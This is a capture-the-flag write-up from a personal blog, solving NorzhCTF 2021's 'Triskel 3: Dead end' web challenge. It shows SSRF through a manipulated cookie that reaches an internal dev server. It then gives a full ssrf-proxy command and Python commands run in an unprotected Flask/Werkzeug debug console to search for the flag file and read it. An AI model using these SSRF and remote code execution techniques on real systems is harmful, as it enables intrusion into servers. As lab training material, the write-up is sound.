szymanski.ninja
About
CTF Writeups
Contact
pl|en

NorzhCTF 2021: Triskel 3 : Dead end

Triskel 3 : Dead end

Category: Airport hall/web

chal

50 points

You are admin now… Anyway now you can’t access any information or have more privileges so I guess it’s the end of your journey haha!

by Remsio

Solution

Next challenge, straightaway after Triskel 2.

Examination of cookies shown interesting confidential_documents cookie, which was in fact the target for ssrf.

It took me a while until I found that changing kontammadur_klanvour.prod.local%3A5001%2Fdocuments to kontammadur_klanvour.dev.local%3A5001%2Fdocuments can get me access to confidential documents on development server.

documents

Below the content of documents:

  • patient0.txt 
We got intel about the french patient0, it's a CTF player named kalèche.. 
He's from Brittany and he says he caught it from Twitter.
  • coup_de_gueule.txt 
Are you kidding me? Who deactivated the PIN to access dev platform console??? ヽ(`Д´)ノ
  • desactivation_prod.txt 
The production server has been deactivated because our delopers have been targeted by a phishing campagn.
  • attack.txt 
[CONFIDENTIAL]

There were proof that some hackers accessed our infrastructure last month, I'm pretty sure they are targeting us.
We need to be careful and to prepare ourselves to worse!


[CONFIDENTIAL]

I’ve spent a lot of time trying to do something with those hints. Finally, I found development platform console by changing the cookie to kontammadur_klanvour.dev.local%3A5001%2Fconsole.

console

It was very uncomfortable to play with this challenge by constantly changing the cookie, that’s why I’ve decided to change a bit approach and use ssrf-proxy again (like in case of previous, Triskel 2). This time with some additional tweaks, I’ve launched the program as below. 

ssrf-proxy -u http://10.45.4.38:8100/admin_management_page.php?document=1 --cookie='PHPSESSID=ooJzbY6G3trMrzWP9nnvu8q6JM-14ef1df8f14366b27cf88aca83bc5d0c;confidential_documents=xxURLxx' --rules=noproto --match='.*<pre>\n\s\s\s\s\s\s\s\sCant\sconnect\sto\sAPI\s\s\s\s\s\s\s</pre>\n\n\s\s\s\s\s\s<div>(.*)</div>\n\s\s\s\s\s\s<p\sclass="bg-success\stext-center">API\sPowered\sby\sWerkzeug</p>.*'

Quick proxy reconfiguration and I got python console running in the browser.

console running

Few commands later I get the flag. 

>>> print(subprocess.check_output(['find', '/', '-name', 'flag*']))
b'/sys/devices/pnp0/00:05/tty/ttyS2/flags\n/sys/devices/pnp0/00:03/tty/ttyS0/flags\n/sys/devices/pnp0/00:06/tty/ttyS3/flags\n/sys/devices/pnp0/00:04/tty/ttyS1/flags\n/sys/devices/virtual/net/eth0/flags\n/sys/devices/virtual/net/lo/flags\n/proc/sys/kernel/sched_domain/cpu0/domain0/flags\n/proc/sys/kernel/sched_domain/cpu1/domain0/flags\n/usr/share/mercurial/help/flags.txt\n/flag.txt\n'
      

>>> print(open('/flag.txt', 'rt').read())
NORZH{FLASK_C0ns0l3_RCE_without_pin_seriously.._wait_did_I_land?}

Flag

NORZH{FLASK_C0ns0l3_RCE_without_pin_seriously.._wait_did_I_land?}

Privacy Policy
luc © 2021